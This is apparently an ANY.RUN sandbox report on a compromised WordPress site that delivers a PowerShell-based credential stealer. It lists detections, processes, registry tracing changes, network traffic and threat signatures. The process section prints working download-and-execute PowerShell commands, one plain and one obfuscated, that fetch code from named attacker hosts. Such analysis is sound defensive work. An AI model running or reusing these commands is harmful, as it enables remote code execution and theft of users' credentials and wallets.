URL:

https://mdsbusinesssolutionsltd.com/

Full analysis: https://app.any.run/tasks/48594caf-2178-4922-8352-9628ace81c23
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: January 15, 2026, 16:27:40
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
websocket
stealer
arch-exec
arch-doc
susp-powershell
python
Indicators:
MD5:

EF1B0548B44B36BA7F344AEB2CC5F8CE

SHA1:

77A0DFE1E816A95CCA425A3AD22CD1D83F709E49

SHA256:

E9538275B11E84543CB0DCF560189D6DCCEE8B29F08B912EFB36D481627353E7

SSDEEP:

3:N8xjbWWNeRMKqyTK:2XNeR2

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Use SyncAppvPublishingServer as a Powershell host to execute Powershell code

      • wscript.exe (PID: 8852)
      • wscript.exe (PID: 9104)

    • Changes powershell execution policy (RemoteSigned)

      • wscript.exe (PID: 8852)
      • wscript.exe (PID: 9104)

    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 9104)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 9168)
      • powershell.exe (PID: 8904)

    • Actions looks like stealing of personal data

      • powershell.exe (PID: 3152)

    • Steals credentials from Web Browsers

      • powershell.exe (PID: 3152)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 8924)
      • powershell.exe (PID: 4632)
      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 6892)

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 3152)

    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 6892)
      • powershell.exe (PID: 4632)

    • Modifies registry (POWERSHELL)

      • powershell.exe (PID: 2236)

  • SUSPICIOUS

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 8852)
      • wscript.exe (PID: 9104)

    • The process hide an interactive prompt from the user

      • wscript.exe (PID: 8852)
      • wscript.exe (PID: 9104)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 8904)
      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 4632)

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 9104)
      • powershell.exe (PID: 9168)
      • wscript.exe (PID: 8852)
      • powershell.exe (PID: 3152)

    • The process executes VB scripts

      • powershell.exe (PID: 8904)

    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 8904)
      • powershell.exe (PID: 3152)
      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 4632)

    • Executes script without checking the security policy

      • powershell.exe (PID: 9168)
      • powershell.exe (PID: 3152)

    • Manipulates environment variables

      • powershell.exe (PID: 9168)
      • powershell.exe (PID: 8904)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 9168)
      • powershell.exe (PID: 3152)

    • Possible stealing from browsers

      • powershell.exe (PID: 3152)

    • Possible stealing of email data

      • powershell.exe (PID: 3152)

    • Possible stealing of cloud data

      • powershell.exe (PID: 3152)

    • Possible stealing of FTP data

      • powershell.exe (PID: 3152)

    • Possible stealing from crypto wallets

      • powershell.exe (PID: 3152)

    • Possible stealing from 2fa

      • powershell.exe (PID: 3152)

    • Possible stealing of VPN data

      • powershell.exe (PID: 3152)

    • Found IP address in command line

      • powershell.exe (PID: 8924)
      • powershell.exe (PID: 4632)
      • powershell.exe (PID: 6892)
      • powershell.exe (PID: 2236)

    • Possible stealing from password managers

      • powershell.exe (PID: 3152)

    • Possible stealing of messenger data

      • powershell.exe (PID: 3152)

    • Application launched itself

      • powershell.exe (PID: 3152)

    • Possibly malicious use of IEX has been detected

      • powershell.exe (PID: 3152)

    • Probably download files using WebClient

      • powershell.exe (PID: 3152)

    • Starts process via Powershell

      • powershell.exe (PID: 9168)

    • Receives information about network interfaces and IP addresses (POWERSHELL)

      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 4632)

    • Gets content of a file (POWERSHELL)

      • powershell.exe (PID: 2236)

    • Gets path to any of the special folders (POWERSHELL)

      • powershell.exe (PID: 4632)
      • powershell.exe (PID: 2236)

    • Possible path obfuscation (POWERSHELL)

      • powershell.exe (PID: 4632)
      • powershell.exe (PID: 2236)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 4632)
      • powershell.exe (PID: 2236)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 4632)

    • The process drops C-runtime libraries

      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 4632)

    • Process drops python dynamic module

      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 4632)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 4632)

    • Loads Python modules

      • AcPowerNotification.exe (PID: 8416)
      • AcPowerNotification.exe (PID: 6240)

    • Reads security settings of Internet Explorer

      • AcPowerNotification.exe (PID: 8416)
      • AcPowerNotification.exe (PID: 6240)

    • Executes application which crashes

      • AcPowerNotification.exe (PID: 6240)

    • Connects to unusual port

      • AcPowerNotification.exe (PID: 6240)

  • INFO

    • Connects to unusual port

      • msedge.exe (PID: 7908)

    • Reads the computer name

      • identity_helper.exe (PID: 7212)
      • TextInputHost.exe (PID: 7308)
      • AcPowerNotification.exe (PID: 8416)
      • AcPowerNotification.exe (PID: 6240)

    • Application launched itself

      • msedge.exe (PID: 7572)

    • Reads Environment values

      • identity_helper.exe (PID: 7212)
      • AcPowerNotification.exe (PID: 8416)

    • Checks supported languages

      • identity_helper.exe (PID: 7212)
      • TextInputHost.exe (PID: 7308)
      • AcPowerNotification.exe (PID: 8416)
      • AcPowerNotification.exe (PID: 6240)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8904)
      • powershell.exe (PID: 9168)
      • powershell.exe (PID: 6892)
      • powershell.exe (PID: 8924)

    • Disables trace logs

      • powershell.exe (PID: 8904)
      • powershell.exe (PID: 3152)
      • powershell.exe (PID: 8924)
      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 4632)
      • powershell.exe (PID: 6892)

    • Checks proxy server information

      • powershell.exe (PID: 8904)
      • powershell.exe (PID: 3152)
      • slui.exe (PID: 8468)
      • powershell.exe (PID: 4632)
      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 6892)
      • powershell.exe (PID: 8924)
      • AcPowerNotification.exe (PID: 6240)
      • WerFault.exe (PID: 6900)

    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 8904)
      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 4632)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 8904)

    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 8904)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 3152)
      • powershell.exe (PID: 6892)
      • powershell.exe (PID: 4632)
      • powershell.exe (PID: 2236)

    • Manual execution by a user

      • wscript.exe (PID: 8852)

    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 4632)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 4632)
      • powershell.exe (PID: 2236)

    • User-Agent configuration (POWERSHELL)

      • powershell.exe (PID: 4632)
      • powershell.exe (PID: 2236)

    • Failed to connect to remote server (POWERSHELL)

      • powershell.exe (PID: 8924)

    • The sample compiled with english language support

      • powershell.exe (PID: 2236)
      • powershell.exe (PID: 4632)

    • The executable file from the user directory is run by the Powershell process

      • AcPowerNotification.exe (PID: 8416)
      • AcPowerNotification.exe (PID: 6240)

    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 2236)

    • Python executable

      • AcPowerNotification.exe (PID: 8416)
      • AcPowerNotification.exe (PID: 6240)

    • Reads the machine GUID from the registry

      • AcPowerNotification.exe (PID: 8416)
      • AcPowerNotification.exe (PID: 6240)

    • Creates files or folders in the user directory

      • AcPowerNotification.exe (PID: 6240)
      • WerFault.exe (PID: 6900)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
213
Monitored processes
55
Malicious processes
7
Suspicious processes
1

Behavior graph

Click at the process to see the details
start msedge.exe msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs textinputhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs slui.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs wscript.exe no specs powershell.exe conhost.exe no specs wscript.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs chrome.exe no specs msedge.exe no specs powershell.exe powershell.exe powershell.exe powershell.exe msedge.exe no specs msedge.exe no specs svchost.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs acpowernotification.exe msedge.exe no specs acpowernotification.exe werfault.exe msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1840"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --always-read-main-dll --field-trial-handle=6276,i,2106856141532888844,4835379085185278501,262144 --variations-seed-version --mojo-platform-channel-handle=5792 /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1948"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --disable-quic --onnx-enabled-for-ee --string-annotations --always-read-main-dll --field-trial-handle=5872,i,2106856141532888844,4835379085185278501,262144 --variations-seed-version --mojo-platform-channel-handle=5936 /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2236powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://194.150.220.218/4SLEYpfAk57hGubo/ktkhzktujk')"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
2292C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2416"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=7124,i,2106856141532888844,4835379085185278501,262144 --variations-seed-version --mojo-platform-channel-handle=5692 /prefetch:1C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2668"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --always-read-main-dll --field-trial-handle=6760,i,2106856141532888844,4835379085185278501,262144 --variations-seed-version --mojo-platform-channel-handle=7104 /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3152"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoP -C & (gal i*************************************************************************************************************?*********************x)(& (gcm *************************************************************************************************************************estM*****************************************************) woosh-duck.agri-clock-core-sn.in.net/dqqwkutvum);while(1){sleep 60} C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
4124"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4272,i,2106856141532888844,4835379085185278501,262144 --variations-seed-version --mojo-platform-channel-handle=4200 /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4124"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=3 --enable-main-frame-before-activation --renderer-client-id=23 --always-read-main-dll --field-trial-handle=6576,i,2106856141532888844,4835379085185278501,262144 --variations-seed-version --mojo-platform-channel-handle=5884 /prefetch:2C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4620"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --disable-quic --string-annotations --always-read-main-dll --field-trial-handle=6816,i,2106856141532888844,4835379085185278501,262144 --variations-seed-version --mojo-platform-channel-handle=5200 /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
133.0.3065.92
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\133.0.3065.92\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
54 482
Read events
54 465
Write events
17
Delete events
0

Modification events

(PID) Process:(3152) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3152) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3152) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(3152) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(3152) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(3152) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(3152) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(3152) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(3152) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(3152) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
Executable files
33
Suspicious files
140
Text files
270
Unknown types
0

Dropped files

PID
Process
Filename
Type
7572msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\ClientCertificates\LOG.old~RFfdcca.TMP
MD5:
SHA256:
7572msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\ClientCertificates\LOG.old
MD5:
SHA256:
7572msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RFfdcca.TMP
MD5:
SHA256:
7572msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old
MD5:
SHA256:
7572msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RFfdcf9.TMP
MD5:
SHA256:
7572msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
7572msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\LOG.old~RFfdce9.TMP
MD5:
SHA256:
7572msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old~RFfdd18.TMP
MD5:
SHA256:
7572msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey\LOG.old
MD5:
SHA256:
7572msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RFfdd18.TMP
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
511
TCP/UDP connections
260
DNS requests
141
Threats
37

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7908
msedge.exe
GET
200
150.171.28.11:80
http://edge.microsoft.com/browsernetworktime/time/1/current?cup2key=2:duj8eQSkyiOzs6M6Kohd6C-q5e_z8S9HoX6rn6pRKww&cup2hreq=e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
unknown
whitelisted
7908
msedge.exe
GET
200
68.65.122.52:443
https://mdsbusinesssolutionsltd.com/
unknown
html
128 Kb
unknown
7908
msedge.exe
GET
200
68.65.122.52:443
https://mdsbusinesssolutionsltd.com/wp-content/plugins/banca-core/inc/template_library/templates/assets/css/template-frontend.min.css?ver=1.0.0
unknown
text
96 b
unknown
7908
msedge.exe
GET
200
68.65.122.52:443
https://mdsbusinesssolutionsltd.com/wp-content/themes/banca/assets/vendors/font-awesome/style.css?ver=6.9
unknown
text
73.0 Kb
unknown
7908
msedge.exe
GET
200
68.65.122.52:443
https://mdsbusinesssolutionsltd.com/wp-content/uploads/elementor/css/post-10.css?ver=1768360382
unknown
text
1.20 Kb
unknown
7908
msedge.exe
GET
200
150.171.22.17:443
https://config.edge.skype.com/config/v1/Edge/133.0.3065.92?clientId=4489578223053569932&agents=EdgeFirstRun%2CEdgeFirstRunConfig&osname=win&client=edge&channel=stable&scpfre=0&osarch=x86_64&osver=10.0.19045&wu=1&devicefamily=desktop&uma=0&sessionid=65&mngd=0&installdate=1661339457&edu=0&soobedate=1504771245&bphint=2&fg=1&lbfgdate=1741678270&lafgdate=0
unknown
text
892 b
whitelisted
7908
msedge.exe
GET
200
150.171.28.11:443
https://edge.microsoft.com/serviceexperimentation/v3/?osname=win&channel=stable&osver=10.0.19045&devicefamily=desktop&installdate=1661339457&clientversion=133.0.3065.92&experimentationmode=2&scpguard=0&scpfull=0&scpver=0
unknown
text
446 b
whitelisted
7908
msedge.exe
GET
200
104.18.23.222:443
https://copilot.microsoft.com/c/api/user/eligibility
unknown
text
25 b
whitelisted
7908
msedge.exe
GET
200
68.65.122.52:443
https://mdsbusinesssolutionsltd.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.34.1
unknown
text
53.2 Kb
unknown
7908
msedge.exe
GET
200
68.65.122.52:443
https://mdsbusinesssolutionsltd.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=6.1.4
unknown
text
2.88 Kb
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
4576
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6768
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5772
RUXIMICS.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
7908
msedge.exe
150.171.28.11:80
edge.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7908
msedge.exe
150.171.22.17:443
config.edge.skype.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7908
msedge.exe
68.65.122.52:443
mdsbusinesssolutionsltd.com
NAMECHEAP-NET
US
unknown
7908
msedge.exe
150.171.28.11:443
edge.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
7908
msedge.exe
104.18.23.222:443
copilot.microsoft.com
CLOUDFLARENET
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.104.136.2
  • 51.124.78.146
whitelisted
google.com
  • 142.250.184.238
whitelisted
edge.microsoft.com
  • 150.171.28.11
  • 150.171.27.11
whitelisted
config.edge.skype.com
  • 150.171.22.17
whitelisted
mdsbusinesssolutionsltd.com
  • 68.65.122.52
unknown
copilot.microsoft.com
  • 104.18.23.222
  • 104.18.22.222
whitelisted
client.wns.windows.com
  • 172.211.123.249
  • 172.211.123.248
whitelisted
www.bing.com
  • 2.16.241.200
  • 2.16.241.212
  • 2.16.241.222
  • 2.16.241.206
  • 2.16.241.219
  • 2.16.241.205
  • 2.16.241.207
  • 2.16.241.224
  • 2.16.241.203
whitelisted
fonts.googleapis.com
  • 142.250.186.138
  • 142.250.185.74
whitelisted
fonts.gstatic.com
  • 142.250.185.131
  • 142.251.208.3
whitelisted

Threats

PID
Process
Class
Message
7908
msedge.exe
Misc activity
ET INFO Observed Smart Chain Domain in DNS Lookup (bsc-testnet .drpc .org)
7908
msedge.exe
Misc activity
ET INFO Observed Smart Chain Domain in TLS SNI (bsc-testnet .drpc .org)
7908
msedge.exe
Misc activity
ET INFO Observed Smart Chain Domain in DNS Lookup (bsc-testnet .drpc .org)
7908
msedge.exe
Misc activity
ET INFO Observed Smart Chain Domain in TLS SNI (data-seed-prebsc-1-s1 .bnbchain .org)
7908
msedge.exe
Misc activity
ET INFO Observed Smart Chain Domain in DNS Lookup (data-seed-prebsc-1-s1 .bnbchain .org)
7908
msedge.exe
Misc activity
ET INFO Observed Smart Chain Domain in TLS SNI (data-seed-prebsc-1-s1 .bnbchain .org)
7908
msedge.exe
Misc activity
ET INFO External IP Lookup Service in DNS Query (ip-info .ff .avast .com)
7908
msedge.exe
Misc activity
ET INFO External IP Lookup Service in DNS Query (ip-info .ff .avast .com)
7908
msedge.exe
Misc activity
ET INFO Observed External IP Lookup Domain (ip-info .ff .avast .com) in TLS SNI
A Network Trojan was detected
ET MALWARE EtherHiding Magecart Exfil M2
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
https://mdsbusinesssolutionsltd.com/